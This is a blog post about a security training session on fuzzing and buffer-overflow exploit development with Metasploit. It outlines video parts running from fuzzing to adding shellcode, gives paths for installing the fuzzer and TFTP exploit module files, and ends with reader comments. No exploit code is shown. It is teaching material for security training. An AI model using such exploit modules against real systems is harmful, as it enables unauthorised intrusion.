Friday, January 7, 2011

Fuzzing and Exploit Development with Metasploit - Louisville Metasploit Class

Originally posted on: TUESDAY, MAY 4, 2010 AT 5:17PM

On May 8th the Kentucky ISSA held a training in Louisville, KY. I was asked to teach the section on Fuzzing and Exploit Development. Having only an hour to cover this VERY complex topic I demonstrated a basic buffer overflow. We start with fuzzing and go through the basic steps of development. This is an old, well known exploit but it demonstrates the important principles. Feel free to follow along with the videos and post any questions in the comments section.

Talk: Video

Slides: Download

Download Immunity DBG - Go To Immunity

Download Files - Here

Copy the simple_fuzzer.rb file to %MSFROOT%/modules/auxiliary/fuzzers/tftp/

Copy the tftp32-* files to %MSFROOT%/modules/exploit/windows/priv/

Note: In backtrack %MSFROOT% is /pentest/exploit/framework3

Note: You will need to create the tftp and priv folders.

Part One - Fuzzing with Metasploit

Part Two - Finding EIP

Part Three - Build the Exploit

Part Four - Find EIP Offset

Part Five - Add and Test EIP Overwrite

Part Six - Add Shellcode


  1. Hi NullThreat,

    Unable to Access files & Slides @

    Access Denied. So Could you please share it again..

  2. Infosec,

    The links seem to be working, If you are still having trouble email me at nullthreat(AT)gmail(DOT)com

  3. have you tried creating a fuzzer for webs?

  4. Hey, I just finished watching this (actually got it as one big AVI off Crenshaw's site) and this is some really, really great stuff. Can you point me in the right direction to get good at this quickly?

    I'm looking to:
    (*) Learn shellcoding
    (*) Learn to use a debugger in this capacity
    (*) Learn all those fun little tricks besides the really basic exploit you showed that everybody kept teasing you for
    (*) Learn what I'm supposed to be asking to learn.

    I've got a working knowledge of assembler from core war and some programming experience, but no network programming experience, so that's probably something I should look into as well.

    Thanks in advance

  5. Very nice tutorials on Fuzzing, keep posting, we have a lake of documentation about fuzzing when it comes to direct application.